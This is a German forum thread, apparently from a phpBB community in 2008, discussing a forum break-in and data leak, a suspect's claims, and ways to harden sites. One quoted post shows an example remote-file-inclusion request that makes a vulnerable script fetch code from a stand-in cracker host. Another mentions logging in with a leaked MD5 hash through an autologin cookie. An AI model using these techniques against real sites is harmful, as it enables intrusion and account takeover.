Ich denke mal, er hat überall gelesen, dass es zur Strafanzeige gekommen ist und will nun seinen Kopf aus der Schlinge ziehen. Aber selbst wenn er "nur Vermittler" wäre, wäre er dran. Warum sollte jemand den Vermittler spielen, wenn er den anderen nicht gut kennt, oder es ihm keinen Vorteil bringt? Mitgefangen, mitgehangen heisst es nicht umsonst in der Justizwelt. Ich denke immer noch, dass es nun nur Ausflüchte eines verängstigten Jungen sind, der sich nicht bewusst war, welche Wellen seine "Schaut mal wie toll ich bin"-Aktion schlagen würde.
Hallo,
ich muss gestehen, das ich die >40 Seiten Posts nicht ALLE komplett durchgelesen habe, aber als reiner Benutzer "anderer" Software (WL) bin ich doch wirklich erstaunt, wie gesittet im allgemeinen der Thread hier doch abläuft und wie Ihr hier die Admin´s unterstützt.
[BTK] Tobi hat geschrieben:Ein Schutz der aber recht gut gegen die meisten Angriffsversuche hilft und unschöne Einträge im Log vermeidet währe wie weiter oben schon gepostet ein Eintrag in der .htaccess, vorausgesetzt der Server unterstützt mod_rewrite
Das verhindert das Sachen wie domain.tld?mode=http://crackerseite.tld/böses-script.txt aufgerufen und so durch eine Sicherheitslücke ausgeführt werden können. Alle solchen versuche werden einfach zu dem Rechner der versucht hat das aufzurufen zurück geleitet.
Muss der Eintrag nur in die .htaccess im root oder muss so eine .htaccess in jedes Verzeichnis?
Nebenbei: Dieser Thread strotzt nur so vor "Ich will hier raus" und "selber Schuld" und irgendwelchen anderen unproduktiven Beiträgen, die keinem helfen. Das macht es sehr schwer, die Beiträge herauszufiltern, die wirklich nützlich sind.
Zuletzt geändert von hoheidt am 06.02.2008 13:21, insgesamt 1-mal geändert.
Alles Stars im (Internet)Dschungel Und die wollen halt raus ....
VARAN-eV.de - V.A.R.A.N. e.V. - Verein für Artenschutz der Reptilien- und Amphibienhalter Norddeutschlands Terra-Nord.de - Der Terraristik Stammtisch im Norden ReptilienManager.de - Die Online Reptilien Verwaltung
tost hat geschrieben:
In dem Sinne verwendet bessere Passwörter!
Grüße
Genau, mit dem MD5-Hash und der email-Adresse lassen sich nämlich keine Schweinereien anstellen...:rolleyes:
Doch kann man, da man sich mit einem Autologin-Cookie einloggen kann. Deswegen hat die neuere Version von phpbb2 auch ein 2-Stufen-Login-System für den Adminbereich erhalten bzw. deswegen sollte man das Admin-Verzeichnis zusätzlich per .htaccess schützen.
Ich habe mich von Kurzem mit dieser Problematik beschäftigt, weshalb ich da noch einen User-Agent integrieren werden, um sowas zu verhindern.
Gruß
Dann hätte man es auch gleich richtig machen können. Also meldet man sich mit Passwort A an . Will man dann in den Admin Bereich braucht man Passwort B . Und damits damit kein Vertun gibt wird man gleich bei der Installation gezwungen unterschiedliche Passwörter zu vergeben. Auch wenn man zusätzlich Admins einrichtet. Und diese müssen dann bestimmte Kriterien erfüllen. In Bezug auf Länge und welche Zeichen enthalten sind.